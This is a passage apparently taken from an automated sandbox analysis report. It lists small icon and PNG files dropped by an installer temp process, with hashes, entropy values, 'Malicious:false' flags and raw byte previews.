                                                                                                                                                                                                                                                          SSDEEP:12:6v/7Uqs1+tuWPx3jbdb1W7vVeaQkcbxKOd1MB09EVxRXXstDRpROyXSF:3qs1vWPxTugaxcbxKwMB09EjUVOyg
                                                                                                                                                                                                                                                          MD5:B9A06A13BF911BA4288024CB22CD4B8E
                                                                                                                                                                                                                                                          SHA1:43D03CC1C89C311CD7E8F39D531341D71CEA5C98
                                                                                                                                                                                                                                                          SHA-256:E37F73F2FC45067F9F946BA9AC18E6D5C87FFDFB096853667699EA5CA116871E
                                                                                                                                                                                                                                                          SHA-512:417D7091DA9950B32A197599775BD72A9DD7A2D996F5F057B47D490A61AD70D697A3D2B293ECDDF0901D6EE482B86CBC04E808E08005550E7F0600AE5F1134A7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.m.KLSQ...so.........ipC0F..$*..h._....H...r.[.........+.....X.......)-..B.....C..t.............).x(....&,/..x..n.`.F.9.y.S..U..bq.....M.f.08}..G"Q.LGC...GQW..B...&.)H|.c6.%DU...08..s.4.#..`..?..]....f. _..c.h.j{?..?q(0........}.h~'.........k..b.eZ.......f..KI0..+kz#..T/.....^.F.]..D`p....`........J8(..2.h]Z.d.j...4..`2.!..1.......KQ.......L..].K....Sq..(:.~CO.R...*4:..s.y.<.|Y..O.3..E]...'...e?.T?H@i.3..U.d,5.....8]..f...t.kh....T.....Xs.).....t.(.q.........0.....M...Y....[.O.Z...vkk......W$..2nl.......].OI..[........$g.2n|.'X..G..]...V..+..#7.|'."..K`jr..h.!...s..`_..Plvt....9..Zt.....D<...q6.8g.r.h..B.Y..]$.P.......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.462526568231166
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:xDsK0GRS99Rss9RRgJw3Y8/atH9aVGS4pF8lY2GSVSSSSSaGR/X/f:lML9RYwottHQVGR8l9TVSSSSSaUvf
                                                                                                                                                                                                                                                          MD5:EA31E69B4C099C0090A088937CE958D6
                                                                                                                                                                                                                                                          SHA1:CC50F1927506BA8B94C17BFEBBA8D7B928C3A2E0
                                                                                                                                                                                                                                                          SHA-256:3F5FDBA100DD35B0BB4DBBC216A6D0E555C11E3C4907871A1B641BAFCEF6AC99
                                                                                                                                                                                                                                                          SHA-512:B3A62801B292D27F8614E8612399A13A1B66C15EE8ED7781A4DE87C05CE8530255A8F4BA993775810D8E4E1DA2647E58B57C3026BB0718294AA6E4C515E888D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..........................D...C...A...A...A...@...@...@...@...@...@...A...A...A...C...D...E../r...e...c...b...`...^...`...`...^..._...a...c...e../r...E...G...k...V...U...T...M...J...K...L...J...L...R...U...V...k...G...I...m...Y...Y...X..........@{...`...........m...Y...Y...m...I...K...q..._..._...^...e..................$r...]..._..._...q...K...M...v...c...c...a...Z...d..........9z...X...^...b...c...v...M...N..!{...g...g...d..s.......................(w...e...g..!{...N...R..$....l...m...k..........R...P...w............l...l..$....R...S..'....q...r...p..#z..`...........z...&{...{...r...q..'....S...U..,....v...v...r..Y........................q...t...v..,....U...W..1....z...z...w...........r...r..........?....y...z..1....W...Y..6....}...}...{...........p...m..........E....}...}..6....Y...[..;...............l.......................%...........;....[...^..A...#..."...#...$...y...............,...#..."...#...A....^...`..[...G...D...E...F...F...F...F...F...F.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):813
                                                                                                                                                                                                                                                          Entropy (8bit):7.700988619334296
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:2/3exgROSyP3NqUTxBlR8kEPzRspi/MKFhG1Bx:hQOZNVR8HVZkKDG1v
                                                                                                                                                                                                                                                          MD5:6EC205B2369CA054BF85B085486CED9D
                                                                                                                                                                                                                                                          SHA1:26C0B61289F804913164DDDAD8F905E12C8BD4A3
                                                                                                                                                                                                                                                          SHA-256:7E436D02E18B665764D2F2C748068AC8069DB59BCDDA9983F09EA370D742474E
                                                                                                                                                                                                                                                          SHA-512:A446CB697276D8AB014E0A38FFB0F6F31FC1BE4DD27A0A795829F4E844237243EE6B7A92A881841DA30F4E3E7A396E6065DAEB4C868CAD7EE195162CCDE0ADBA
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.m.[hTW...}f....8Ij.51!.TI.h.^PJ........*...|.O}RKQ..D.|....,H.. -i....4...1..h&.....]{...v..........,.?.}.......2../...r...........zH% .Z.fA...%;>.. ..MT.+.....c....r....!......%pS.c.......k/..O...W.$Wm.].`.....N.g.......m...b.VTg#zY.j....4T..b.|^..D7....'....\.z....J.j{(....F(.Y.3"..w`^....p.....j.:...........@;.z..UUB...O.E..6.7]..6..5,.J..Y2-...I.1(TJ..Tt...&.#.V..PH.|.[...O....2.....[."+...2....8..K..=..;c4.....uRO[....a...........Z./.3........^{0%.$7|..r7Np..\'.Hw....2..1..+(#.......e%B.saZ:...&s........D...g.3/ ...o*........Q."....Bo:+.@.(_........^m"0..x../..../Q....*.p.C............y;.'.M.*.f.y'Nb........B.|...(..~e.5.....'..w...A...y.|.....B.....z..=$.......$.k.C~...a..1.}...sNH.q;..Y..o...j.].'..~.)..H.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.5696063839477725
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:0onYbuFo5fA8aRoEttw4HX1Jur9OrnYGKBjD21cmex8ZJnISD:9loEttw8uWy9sYK
                                                                                                                                                                                                                                                          MD5:4F38A1E43DE6E4F1BD4BDBCC55706408
                                                                                                                                                                                                                                                          SHA1:BBBDFB099C1921BD944230FC37DC9963FD2EED81
                                                                                                                                                                                                                                                          SHA-256:9CA3C995F7DB760EFF9ED69DFDBA578481CAB520D164F1B7A1201E1DFB7AAA66
                                                                                                                                                                                                                                                          SHA-512:6840EAE20F876A5DE457AB3DC703E28D302FB640E641F9AC2117D8EF30DF447BCC265F3CDC68DA5EE21CF14AA0FFB7AD6873C041DF016DD536018E7BC9E59A90
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ........................................q...................................b.......................................!...............s...................................................................................................x...............................................................MJ...................g...8......................................*#...................................e..~........................................]......................"....................................S.......X...................... ....................................^...............................................i...........................K..........................?...n....................,......................y...J...........................J...................................................................................................................................4...........o..................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):639
                                                                                                                                                                                                                                                          Entropy (8bit):7.377780326372934
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7VDc+Qow9oS1rka1r1gslVtbq7eH8MycqGcjnM1eyYHhLpPiX:fLow9frbxG4qecMCBjnMsyYHiX
                                                                                                                                                                                                                                                          MD5:532021B5830C2239DEE3E8FF33229A0B
                                                                                                                                                                                                                                                          SHA1:4C2280EF8547087BE905669B6F49AEEA4C19E2F5
                                                                                                                                                                                                                                                          SHA-256:AA747B612FBFAC5FAC5866F83687D3683402387436E528C80D6E3B7C48EE770A
                                                                                                                                                                                                                                                          SHA-512:90D8345469986460A788254EDADCBFB13F5C0FFF81F8CD9707C86A47E1DBA426A6318E5BA52ACFC381F81DB59CF10B04A894EF7FC5CBC950CE5B59FD001C5F88
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a... cHRM..z%..............u0...`..:....o._.F....pHYs...........~.....tEXtSoftware.paint.net 4.0.6..c.....IDAT8O.SKH.Q...i..U...J..J.]......tS....E....]..BW...B...?(RE.D4.[.A. .Db2..../.....L..{....X..**...."."w9...e.;.FD.!.Z~8h.;fw.!..J....<1.5......n..L.... ..1.....U..o.........Q.....U.....G.Pg?...m....P[..[EdC..g|.~#.p.T.s...o/q1Z..B3..`...*.......C.K..X....Ym........aF...^.P....L.M..p2...Z..k.g....I....7...IC..P...:.Af.. ...-.P....am.3....~.k}H-.!9^.D.......Y[...?....{.w0W.k...O?...y....P+.5'....!........r..8..|.0N.....z7yD.X+.%..T....+..-..!-jG.o..kn.)61......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):4.943382230545427
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:S4YaNZKzJLGaBGzrHyCX0n3Ols63OjokVhVZcR9dfw8skIL00006fDxzKapll1Km:1uzJJBGH+j5hS9VxAmpKuNNNNNNNNNZ
                                                                                                                                                                                                                                                          MD5:C372CECACDD31BCFD147D55D146C2CD4
                                                                                                                                                                                                                                                          SHA1:A0C7F66256023E4DA4697CE0D37D809D206CC85E
                                                                                                                                                                                                                                                          SHA-256:508BD905BEA0E89DA025DECD1BFE5E4B31A1F003BC3F2B5C5567A2470A307820
                                                                                                                                                                                                                                                          SHA-512:58287A1C0896ABA3F9712FCEA29C3DAF892AE9F485E4DDBA56A442F9B7B6F439D3375A0EB46209FF4E86720B0D5C706BC22F8C49165A34458CA0A4EE2BD94DE7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ...........................Q...F...?...?...?...?...?...?...?...?...?...?...?...>...E...Q...H...i...............................................d...H...C...................E...3...3...3...3................C...E................3...3...3...3...3...3...3.............E...G.............F...3...3...3...3...3...3................H...I.............3...3...3................................J...K.............3...3...3................................L...N.............3...3...3...3...3...3...3................N...P.............3...3...3...3...3...3...3...3.............P...R..............3...3...3...3...3...3...3.................R...T..............3...3...3.................................U...V..............3...3...3.............................W...X.................3................................Y...[.....................................................\...g......................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):658
                                                                                                                                                                                                                                                          Entropy (8bit):7.412255128365162
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7wM6ZjAgxNF+Q7L4f031MIYJqGdhz90Iq7AGg71T+51fDPgME:XMOxbL4+S1nJ0xk71TYzgP
                                                                                                                                                                                                                                                          MD5:79AEBF6646108C56AA59E1D27672A308
                                                                                                                                                                                                                                                          SHA1:BAA186067518DFA1F18A2AFCB50AF03041E40AA4
                                                                                                                                                                                                                                                          SHA-256:B64E7582BFD5CD8AAE7F9AB31B2B12AFF640857B6670873D94C15D0CE70533D9
                                                                                                                                                                                                                                                          SHA-512:D41A2F5A204B43DADF5CC461EB1E713187B6AF616FF651A06299574C7BE1E8E9A634E9259C3B63594E627DE2FC8B5DE4CC02FD2DF5F51E924E74C74A7EAD515A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4.......tEXtCreation Time.12/12/08.Z......IDAT8...MkSQ...s.I./.ik...S..bA1[7n...H@...[...D.n.U..E.bAcH.$MC.....ZIc...8...w..U.=..UsbUU).;.F.+.R3....U.I%P4.E...V.......9rT.].X,V"n.\."&.3.2pn.R."...o...".L`.=..9>...-...w.y..\..#g.^...@..z..P...Z.D......D.ApA.*.........pD.:|...&.x..p......5..R.w..x....SY.../.J&.I..H...'...X....=A.x..&...{....b.0.cEp..:............%..$&........g;f.P..6..t~.S.R.>...[6..s=x.u.r&.O...^..jJQDc0b..............'tc.ec8.#..z......>\..M..b.;.<%..4.0v....o..V/b...&g|mo"..^...N..#.).#..fB....:..t......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):6.276060631735337
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:MXjJ+Ja5yURg0WulL9rChz1XcXbQxX2rD4:kIJ4yURgLkprChzBcXbeXID4
                                                                                                                                                                                                                                                          MD5:97B03F45DC3F2AA6B9908A842ED7A308
                                                                                                                                                                                                                                                          SHA1:5C0489A30B7805DB94B9F60C53616A4CA8BCA5C4
                                                                                                                                                                                                                                                          SHA-256:C08548C6A31E3C58F69B083ADAA3154C5957619E65F1FF910FDBB7F83B480183
                                                                                                                                                                                                                                                          SHA-512:78130C2A02CF5E56103C42E3ADB35CA85DBB8A66259C895F7CEB987B1BC7B73932F54A2F28B4F065765C9B9264E088E57C5DEE70ABCC9B41D9DE6AEE90BE08A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................U="..b<.f>.f>.f>.f>.f>.f>.f>.f>.f>.f>.b<.U=".....W>"..wJ..tH..tH..tH..tH..tH..tH..tH..tH..tH..tH..tH..tH..wJ.W>"..g;.pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..pD..g;.i<.mA..mA..l@..l?..l@..mA..mA..m@..l?..l@..mA..l@..l?..l?..i<.g9.j>..j=..|].......l..i<..j>..sQ.......]..i<..._.......y..f7.e7.g:..d4..............a2..g:..x^.......t..g<..........rJ..e6.c4.c6..a8..............tM..c6..x].......o...........y..a3..c4.a2._1...n......|c..........^0..x[.................[,..`2..a2._/.X'.........]/.........`2..~c...............w..Y*..]..._/.[+.f?.........tL...........j...u..................._..c7..[+.yR.............a...g.......................a...........d..yR.i........u...r...o..........~..........r..............j.z.........................................................z...............................................................p[..............................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):776
                                                                                                                                                                                                                                                          Entropy (8bit):7.739847313028713
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7A0VGIMaJnGINOCUG1s1tdXBlkgV3qICi6aw5FDk+RA1xuw/bK11x8GRtnY1V:5IzGGO60BC/P5iohugnYiLjU
                                                                                                                                                                                                                                                          MD5:F7412F52AFCDBFAA2520A462C99468FC
                                                                                                                                                                                                                                                          SHA1:DE1BAD996FACA409432C84C0EE0724827C00D072
                                                                                                                                                                                                                                                          SHA-256:13F249E23B22582CFC057954C4A040EBA5733E3FEEA3FC3DAB0F9EF584DE89A8
                                                                                                                                                                                                                                                          SHA-512:FA1205996FF98BCA175F38AB210AF47E56DF29E580D8FA16CA6C30C9BF324D53847335149DCDB874178F7642D49AD24DFEC0C67B32F831E6999B9050FB7ECE64
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.S{H.Q.=....)Y....|4..CmeZZ*....!dQ..J..J..aI..... %.LILK..0....SI..H3|l.}[[O.........K.K.....s."#.DB...a...t........hAb\..h4NG.....7j..W.z.fK.3R.....emD4c%...0.....7?a.9.GY..g.......x..<.c..3@....#.......>}....X...v.j.W.$(.....]..(.lF..A..G..m.oU.UW/r..p..1^t..pj4.Y..x...=G...X'[..-..j.NW>.Z.Gdn.E.[..&....'+...@.uk..........Oqd....~r.).G....1.W.L.........@..(..g..![....P..eI...(...(Y....:...h(J.......j.7.......D..M`.....Zd.6B$...rD...K..e2.\....I8..ao..h....Y.|.&... .t@X...u/q.........T,M......Q.%.Vs...!."....rw.GYC.Z.9...a#....G.l51D^..i..... .J?W.hF.>0......(..m=Z.hG.5O...........=%.P.H..-C..P..?.=V.#..~........M....2..T.?..D....._$....qg]....@$...d4.....[j2.....AF%.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.490442714261337
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:hvTTTTTTTTTTTr6TTTTTTTTTTTTc2UTTATTTTTiTTFTTTTKTTTLTTUTTT5PTTVTp:NTTTTTTTTTTT2TTTTTTTTTTTTc2UTTAa
                                                                                                                                                                                                                                                          MD5:3EFC7DC297E404B3905700EC7BAD9F52
                                                                                                                                                                                                                                                          SHA1:51AA1918C57A97D0C0C60D7AE9C55356E6F6B8F9
                                                                                                                                                                                                                                                          SHA-256:455B953BE12AFA28BF8823BBD0A8E2C1D7730878FBCBF7B1D3245D4FB5A09ACA
                                                                                                                                                                                                                                                          SHA-512:29644DA8AB7596B0EF2849BF7BBED4B76478C38DCA6EE7E735D4CA9B4693F1978CF60A5909C8733A98CF5C14F088884FCFC0AED6C85C6109F7838729D18E98F9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ................................................................................................................................................................B...{.....................................F.......d...........................................................d................................................................................................................................................................+,......................................................................$%..............................................................UU......................................................qq......................................................NO.........................................................................................................e...........................................................e.......G.......................................G..............................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):404
                                                                                                                                                                                                                                                          Entropy (8bit):6.917623353697257
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/78/LcZn9Kk5YNxqZcvZ46+mxhdPGDjrc:KZUIYNxtvPZV
                                                                                                                                                                                                                                                          MD5:483305114EBE1A4A44773D21D611216C
                                                                                                                                                                                                                                                          SHA1:3C0FBD8BA2AE801A9B03CC238AB641E65E9B67D2
                                                                                                                                                                                                                                                          SHA-256:A150DC4A0B8367A03736C12A4851EB29D780D3EE2B1D0709B417BE0A5FCE1774
                                                                                                                                                                                                                                                          SHA-512:706D04A9BAC5EFA0F85A2070305BF52908D1D4DFF1AE27B4EA09E7BAC291D94B2E980EEEEA9A9C29559E2C728E44C276561F559532E3DFB929AD70C4829FA111
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...........~.....tEXtSoftware.paint.net 4.1.6.N......IDAT8Oc.......Ya..s...f......-;+,....l.. 9...Z....."..@...`.^...G.I..Az......&y....yI..q.,$..h...l..v..............n.H/.6...........vh.?,...4../..O..wQU....8..n..?....wYG.C...^....$.9......h<'(..M.(...N.g......U..i.9!..@z>.^.T...AI........3.5.........00...!s&...T....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):4.433906899003064
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:FYv/RQcs//cF///cPG/////cP5Q//////cPQ////////ce///////cE4/////c3Q:uv/RdBmTBVlbaMeExLKwePaSO
                                                                                                                                                                                                                                                          MD5:5B44B02CBAC63F77EDFDB9C6B685AD91
                                                                                                                                                                                                                                                          SHA1:D8592C8C56F4E6DE68835268459472F24362A9CD
                                                                                                                                                                                                                                                          SHA-256:9CD7273F90F5F7C4BD2003695920A551B204A2F73690D6B0918323E2649DD15A
                                                                                                                                                                                                                                                          SHA-512:F0D33196CE43A5D599D271E1176A5A76FD09B271A3B44810CD9DE9310FE4EF57EA1D71918F6B596C1AB42755C890B61D5EF49EBDDE72D5AC879C137B497E83E6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................L]..LY.MY..........................................................................9../9..-8.2....O_..MY..MZ..MZ................................................................................................./9../9..-7..-8.2NY.XMZ..MZ..MZ...........................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4286
                                                                                                                                                                                                                                                          Entropy (8bit):3.0368545253190575
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:suW8FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFd:CnnnnnnnckhOktpqNbfYI0HnnU
                                                                                                                                                                                                                                                          MD5:FDA8396F15F15D61AC82C01DEBD0C356
                                                                                                                                                                                                                                                          SHA1:CB0B8623FB7B62BACA444C76BE9F69BD4D2963A1
                                                                                                                                                                                                                                                          SHA-256:E9180F49762D2798D2D3AF867BFA78F7CDEAA87BE9190C4D40BBA799F6E49FCC
                                                                                                                                                                                                                                                          SHA-512:DEEB917EB7240A2D157F11F2167A1B3FE6CE91C63B125F18671C03D8117AAC736B431BBCF6015A73DBEDD94A8F5D10D1988D7FC96FCA0B3F05324EE800581D15
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:...... .... .........(... ...@..... .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...H...................................................................................................................H...H...H...H.....................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
